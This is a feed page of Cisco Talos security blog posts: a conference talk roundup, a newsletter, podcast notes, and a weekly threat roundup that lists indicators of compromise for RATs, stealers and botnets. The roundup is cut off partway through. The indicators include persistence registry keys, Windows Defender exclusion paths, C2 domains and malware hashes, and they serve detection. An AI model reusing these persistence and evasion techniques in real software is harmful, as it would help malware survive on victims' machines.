Quantcast
Channel: Cisco Talos Blog
Viewing all 2033 articles
Browse latest View live

Talos Black Hat 2019 flash talk roundup

$
0
0

Talos went wall-to-wall at Hacker Summer Camp, showing up to Black Hat and DEFCON with talks, challenges, advice and education.

Over the course of two days at Black Hat, Cisco Security hosted more than 20 talks at our booth, many featuring Talos researchers and analysts.

In case you couldn't swing by the booth, we've got a quick recap of eight of those "flash talks" to give you a quick rundown of what our researchers wanted to get across. Click on each of these videos to hear each speaker give a quick recap, and stay tuned for a future Beers with Talos episode to hear all of them together.

Nick Biasini

Andrew Blunck


Azim Khodjibaev

Matt Valites


David Liebenberg


Josh Williams


Jamie Filson


Earl Carter 


Threat Source newsletter (Aug. 15)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Sorry we missed you last week, we were all away at Hacker Summer Camp. If you missed us at Black Hat, we have a roundup up on the blog of some of the “flash talks” from our researchers and analysts.

Patch Tuesday was also this week, and we’ve got you covered with Snort rules and coverage of some of the most critical bugs. 

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • The United Nations says it is investigating 35 different North Korean state-sponsored cyber attacks in 17 countries. A new report states the attacks hoped to raise money to fund the country’s atomic weapons program. 
  • Police in South Wales, U.K. are starting to use facial recognition apps to identify suspects without having to take them to a station. The department plans to start testing the app over the next few months on 50 different officers’ phones, but privacy groups are already pushing back. 
  • A sponsored presentation at Black Hat regarding the “Time AI” program was taken down after researchers attacked the talk online and in person. At least one attendee interrupted the talk and accused the speaker of misleading people by pitching this new form of encryption. 
  • Adobe disclosed dozens of vulnerabilities as part of its monthly security update this week, including 76 bugs in Acrobat and Reader. There were also 22 critical vulnerabilities patched in Photoshop. 
  • Google says it is working on replacing passwords for Google services for 1.7 billion Android users. Engineers at the company say the goal is to allow Android users to log into Google sites and services using their fingerprint or other methods because “new security technologies are surpassing passwords in terms of both strength and convenience." 
  • Facebook disclosed that they previously allowed contractors to listen in on and transcribe users’ conversations. The social media site says it recently discontinued the practice, but the Irish Data Protection Commission is still looking into the practice for possible GDPR violations. 
  • A bug in the Steam video game store could open Windows’ users to attacks, but the company says it is not within its scope to fix. 
  • The FBI released a report warning Americans of a recent uptick in dating scams. The agency says malicious actors are using data apps to convince victims to open up new bank accounts to send them money under the guise of a fake user. 
  • Security researchers at the DEFCON conference discovered a critical vulnerability in the F-15, a popular fighter jet used by the U.S. military. If exploited, the bug could shut down a portion of the plane’s cameras and sensors, preventing the transmission of data during missions. 

Notable recent security issues

Title: 31 critical vulnerabilities addressed in latest Microsoft security update
Description: Microsoft released its monthly security update Tuesday, disclosing more than 90 vulnerabilities in several of its products. The latest Patch Tuesday covers 97 vulnerabilities, 31 of which are rated “critical," 65 that are considered "important" and one "moderate." This month’s security update covers security issues in a variety of Microsoft services and software, including certain graphics components, Outlook and the Chakra Scripting Engine.
Snort SIDs: 35190, 35191, 40851, 40852, 45142, 45143, 50936 - 50939, 50969 - 50974, 50987, 50988, 50940, 50941, 50998, 50999, 51001 - 51006 (Written by Cisco Talos analysts)

Title: Cisco releases security patches for multiple products, including high-severity bugs in WebEx Teams
Description: Cisco released security updates to address vulnerabilities in multiple Cisco products. An attacker could exploit the more critical bugs to take control of an affected system. Some of the most severe vulnerabilities exist in Cisco WebEx Network Recording for Microsoft Windows and Cisco Webex Player for Windows. These bugs, identified across five different CVEs, could allow a remote attacker to execute arbitrary code on an affected system.
Snort SIDs: 50902, 50904 - 50907 (Written by Amit Raut) 

Most prevalent malware files this week

SHA 256: b22eaa5c51f0128d5e63a67ddf44285010c05717e421142a3e59bba82ba1325a  
MD5: 125ef5dc3115bda09d2cef1c50869205 
Typical Filename: helpermcp 
Claimed Product: N/A 
Detection Name: PUA.Osx.Trojan.Amcleaner::sbmt.talos  

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3  
MD5: 47b97de62ae8b2b927542aa5d7f3c858 
Typical Filename: qmreportupload.exe 
Claimed Product: qmreportupload 
Detection Name: Win.Trojan.Generic::in10.talos  

SHA 256: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6 
MD5: f7145b132e23e3a55d2269a008395034  
Typical Filename: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6.bin 
Claimed Product: N/A 
Detection Name: Unix.Exploit.Lotoor::other.talos 

SHA 256: 39a875089acaa37c76dd333c46c0072c6db0586c03135153fe6c15ac453ab750  
MD5: df61f138409416736d9b6f4ec72ac0af 
Typical Filename: cslast.gif  
Claimed Product: N/A  
Detection Name: W32.39A875089A-100.SBX.TG 
  
SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510  
MD5: 4a50780ddb3db16ebab57b0ca42da0fb 
Typical Filename: xme64-2141.exe 
Claimed Product: N/A 
Detection Name: W32.7ACF71AFA8-95.SBX.TG 

Beers with Talos Ep. #59: The tardy episode

$
0
0



Beers with Talos (BWT) Podcast episode No. 59 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded 8/2/19 - Yes, I know what today’s date is. We got really busy last week and I am sorry that the podcast is late. Really, I wish I wasn’t writing these notes at 12:#0r4-j3pofw…. What? Anyway, we talk about malvertising and dig into that ecosystem a bit looking at some of the competing priorities (hint: none of them are your privacy). We also discuss BlueKeep making its debut in Canvas and surely soon to follow in other fine pen testing platforms. We use that opportunity to review a little bit of RDP knowledge and defense. We’re recording again tomorrow and I really don’t want to hear what my co-hosts will say if this isn’t out by then, so I’m going to go hit publish now.

The timeline:

  • 01:18 - Roundtable - No one cares about security, end of the dark times is neigh, Cockney Joel
  • 11:50 - Malvertising - how it works and how to stop it (hint: block all the ads)
  • 31:30 - BlueKeep in Canvas - a review in RDP vulnerability
  • 45:00 - Parting shots and closing thoughts

Some other links:


==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler) and Nigel Houghton (@EnglishLFC).

Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Threat Roundup for August 9 to August 16

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 9 and Aug. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Packed.njRAT-7122661-1 Packed njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Malware.HawkEye-7122916-2 Malware HawkEye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media.
Win.Malware.Cybergate-7114776-1 Malware Cybergate, also known as Rebhip, is a Remote Access Trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system.
Win.Malware.Nymaim-7112030-1 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Malware.Tofsee-7112026-1 Malware Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
Win.Malware.Trickbot-7112005-1 Malware Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Malware.Gh0stRAT-7109635-2 Malware Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Packed.Zeroaccess-7109532-0 Packed ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.
Win.Trojan.Shiz-7108197-0 Trojan Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.

Threat Breakdown

Win.Packed.njRAT-7122661-1

Indicators of Compromise

Registry KeysOccurrences
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
18
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
18
<HKCU>\SOFTWARE\91DFFF70961506A1564FE50B6195DEAD 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 91dfff70961506a1564fe50b6195dead
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 91dfff70961506a1564fe50b6195dead
18
<HKCU>\SOFTWARE\91DFFF70961506A1564FE50B6195DEAD
Value Name: [kl]
18
MutexesOccurrences
91dfff70961506a1564fe50b6195dead18
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
187[.]4[.]28[.]10015
189[.]10[.]170[.]1953
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
aab58[.]ddns[.]net18
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91dfff70961506a1564fe50b6195dead.exe18
%TEMP%\iexpress32.exe18

File Hashes

082411fe51dee3bbd6a97833be2f4dcaed2baac2497719384d583ecf10543032 187d82724fbe8fc09023fe8a5bb734acb8eda95cff5e7f80b2481161224539c0 4577dfba3c8f21b0d617fcf22c23e26cc09e7bdbe9b33da561632f8fb94e3e2b 4aa27fd43e7d7bc052b82dcf0b5354c4df80e53cc5a57a73a6ae54665e96f688 4ff742c0e90c295e97e2db692f30435d987ad34deaeafec1ea0772d958c1bb02 5986cbe8265a3a289e5854c5996adce4e415b966d2967b77056fb5f64a2d37ef 606ffb24b488b0d9fb5646779f2806795f836ad1af7565bf8fcc0147318e17a5 60dbc16e6c6f7b338374f48dfa19fb0946275982b021d25370cad3bbc27e303b 95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192 9b7a41fc9ccb0392a9d609fcb583e3b966ed713732342822898ac6d560d569b1 9ec10adc83de49e13e491384047b11e40f2b7567991a11ab03a9703899ab55f0 b168b7b5acf2cb602aacb9c737a9a6e252461e7a4f2a4c0c1eab2fdbd36fdd7a c2d48bfb920ccc59958d456262b6313d6c1246790e1ad0270ea775665e411dac e81f03b9fcfb674248f670d60be4918781bc0c6d6b343f890c2c2fcab15d7ea0 eac06f1399c63d11fb621d348a2a8fb6256262639d239b142092fde76a684eff f0eb05bd16881de42de9a63d54164a9bc68f6f6ea1dcbf5a14a1325c018a4584 f446642655c929d6b069a874364d6da67a6d07f4a2a5f78a77087fb2f1f243aa fe84c213aa4643ba68eeca9e6af567aa809a6c0a3d2b0f9f5fa13aba4033a5de

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.HawkEye-7122916-2

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Registry Key Name
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]16[.]155[.]367
104[.]16[.]154[.]364
93[.]158[.]134[.]382
87[.]250[.]250[.]381
136[.]143[.]191[.]1891
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
whatismyipaddress[.]com11
smtp[.]yandex[.]com3
smtp[.]zoho[.]com1
Files and or directories createdOccurrences
%TEMP%\holdermail.txt11
%APPDATA%\pid.txt11
%APPDATA%\pidloc.txt11
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp11
\Sys.exe9
\autorun.inf9
E:\autorun.inf9
E:\Sys.exe9
%TEMP%\holderwb.txt8
%TEMP%\SysInfo.txt8
%APPDATA%\Windows Update.exe8
%APPDATA%\WindowsUpdate.exe3
%TEMP%\subfolder1
%TEMP%\subfolder\filename.exe1
%TEMP%\subfolder\filename.vbs1

File Hashes

0360cd478f78ed02dc9cebf82d31721fbc6915b0201900cd922e59ccc32f6038 04e3d5854d00d835e206b0982889a079e3710296d33ed1ebdaf349b4bbcf790a 1c38e7e3f9a7277e60399523a664c73ad1e950de5ab59981f6ce77c908403448 49d6cfdd06d8d9a234f5e59849b47199e52a0355479563c76896edd91ca7c04e 621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add 7da2b98047bf4812b37f670b7a75b1b0ccd414802a3c59e564fe0437d23964da 939b12fcce7c902fff5730a6cde141311baf0a322e9334cf1dd13230c68e7794 b23e50aa8217e033f01bfe6c52e651a3d169a202e6949a4d0d7c5a4ad145a857 d187fe363c737c1c3babe56649a39a1dc1d0da4cc7aef65e4782ba0c801e5079 d5a45f2dac9346b72a23fe10c07dc4ce234e7e577fd6c2e471464276651df1f9 e584d0e379aa3fcb0c7f9de3106ae4234d88ceca407a9645a4edcf57b9202cce

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Cybergate-7114776-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: MSQM
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: MSQM
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Realtek Audio
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Adobe Starter
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1C7T55HW-D326-IWQK-6087-652774G5V2RN} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1C7T55HW-D326-IWQK-6087-652774G5V2RN}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J} 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Audio
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Audio
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6W6SH85E-GESR-7C8G-187D-4M6664523332} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6W6SH85E-GESR-7C8G-187D-4M6664523332}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{216555Q4-64KR-BMG3-55K7-2354V88S0LSE} 1
MutexesOccurrences
_x_X_BLOCKMOUSE_X_x_13
_x_X_PASSWORDLIST_X_x_13
_x_X_UPDATE_X_x_13
Pluguin12
Pluguin_PERSIST12
Pluguin_SAIR12
***MUTEX***1
***MUTEX***_PERSIST1
***MUTEX***_SAIR1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
187[.]58[.]232[.]1812
52[.]8[.]126[.]801
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
rainoide[.]no-ip[.]org12
www[.]server[.]com1
Files and or directories createdOccurrences
%TEMP%\XX--XX--XX.txt13
%TEMP%\UuU.uUu13
%TEMP%\XxX.xXx13
%APPDATA%\logs.dat13
%SystemRoot%\SysWOW64\Microsoft13
%SystemRoot%\SysWOW64\Microsoft\svchost.exe12
%SystemRoot%\SysWOW64\Microsoft\svchost1

File Hashes

19f9ab1a6f01c5bb060fd865f165d48789f6b6c561960071823b6fcfbddc733b 40fc7ace7357cb61cb7ad47e655d7d33c0952cbea1fae151f969eca85deea68d 6b185c176128cf98a5241c3d10d0486cb3b4c3a8877d7831beed7088b688ee93 889728767005bed83d50f8ac92d4f8685be74f71155537c011dbdfb5da861b26 949809f505011d5b9aacc19fde3bead211004bce92921a460afe8e8f57b92923 ad8f56bddd8a0cae565c243ff0e4422781f78cc3033763d2a9100e32c2ffe98c b3b914069bb60dab4a0679f912c43f77a3c4bf71804fcbd5085646336dc41908 b3ded4b6a12a5a232816b33546167fa3e90eb78ac2876d1c6b4adaad4b75abc1 c5d0479add616c17dfdef957dc106522ff40bebd08ab070b0941474715a29dfb c7f2645df614351360457a892f9849df80155330e10449d4448d357c3d717ceb dc416c86df2bad0adde036bda83db1fbcac13036a2ea7f73453597e7a3d5788c ee13ecb06987aeef5bef6de64e0e5439b44f07f9f0783d8cdb6ace3fa950a6a1 f2a2dc50a052bc4a25cc8fcdd235d89286fec24beede6f6cb78b7641162bec0e

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Nymaim-7112030-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 25
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
25
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}25
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}25
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}25
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}25
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}25
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}25
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}25
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}25
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}25
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
grkokxuhgk[.]net24
utjawtkqtw[.]com24
glgythylattw[.]in24
xdqhf[.]com24
kcrrrqnoan[.]com24
bweyobzofdy[.]com24
xukgvscceju[.]in24
luewnrtwhigf[.]in24
zwhgvnfdb[.]com24
bxsfawcpsgwl[.]com24
hwhskkbdlc[.]in24
uxwauildd[.]pw24
cogkyi[.]com24
tqsxnfi[.]net24
jvelkgcftqy[.]pw24
uihmdwnvp[.]com1
wnucbhflcr[.]in1
bpgfuc[.]in1
zrhqhmghjx[.]com1
sdwnmtsxtjcf[.]pw1
rfvztqxsfiz[.]net1
cofuvrdr[.]in1
kdhlszxotsd[.]in1
arnkxqhjjs[.]in1
fanshg[.]in1
*See JSON for more IOCs
Files and or directories createdOccurrences
%ProgramData%\ph25
%ProgramData%\ph\fktiipx.ftf25
%TEMP%\gocf.ksv25
%ProgramData%\<random, matching '[a-z0-9]{3,7}'>25
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>25
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>25
%TEMP%\fro.dfx23
\Documents and Settings\All Users\pxs\pil.ohu23
%TEMP%\bpnb.skg4

File Hashes

01fbd952fe57f673aea818e12a0aa675c9e29e1ba0f85d28645a926f3df4f7f4 028423fc9b5fb8f3fc0f985e43b703ce05e69a3828f7152dda5d6e6bc3175da7 05263f754c5456ad772dd2448b85e9fefd1c4204f12391d8068bcba7cc388c53 0b51bc5550062212ed1ac0a7099235e2fd0296b93446106b0220fab519fd634e 143c9de178660a194d5e22ba45bd7d1d56d3f286eb16ff9a1206cbbecaf811a1 2dbd752e0cb2b3b1d20fa8e714281b8856fc121b4a2670937f7956f90dfe9ecd 3180f041ff1ccd52f829f222e5d124935a11bc3aa9fc908e3ce93f84e1ec49dc 3f88dae29802bbbd85c175ce34b40b4bf34f884768b6669a91981f374bd1cd1f 441649516eb75a61f2ca4d0570dd2e201c6528b452ce7bc04c5120a5b36ee090 485e521ef0299ede43da514cdf8992bddc95529209889e562d0cab884bf71cdd 54875c46bc6795dd22af5760a5452f3814a5b6827ed996d6a475ec95b9107626 645c58460c7d1b0ef4769d505492eb5a9bba5efadf9f6a456313df72bf706eda 6802f2b005b9e02f395117ce2f753d98d239d9271825871105cca11f86764ada 8519328e272602bc7117a7c9da2c00e40e8d45a97528ed3fa7c86f2fdeb9b679 862346823cef73fdd9a155b84edb2feb180a61390a3817ef97fa272cb01d7994 95556cf5e5a160d2940014413d4948bc4877a127ce142bf27a7295ca212e48ae 991bd9883c36b2fdf326418d6ec660c6a5d57e88f2355a49a5c69b2490c848b3 9d30abaa088f71f0914d083a8c6232e37e1fb13bdb495c6d3b1485b50f764e42 b0eb5e5599605584271a1513740039d6cfc363d7203e8654d9ece9d7df1b06a2 bc11794224c3dba73fefc8be9bea7ddc8782db3e3173467a1726e02588e56019 c3120a24f20ecedf04b17c71bc7f1588d1daa776ea66b1b85f713ffe7136c944 c9017faf332ab5c93fadda86db30d7e6b6a67afd6aa0cf1334b1744e16497b69 d0f6e3867416053747e82117e4cf5b5dd1a0f573316ddf6d1716465726bbb215 e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719 eae1547bca1f3c4425f9ea295ee6cebef5a6815ed6348107cb23cccbfd8fb1e0
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Tofsee-7112026-1

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
10
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]25016
69[.]55[.]5[.]25016
172[.]217[.]11[.]3616
46[.]4[.]52[.]10916
176[.]111[.]49[.]4316
85[.]25[.]119[.]2516
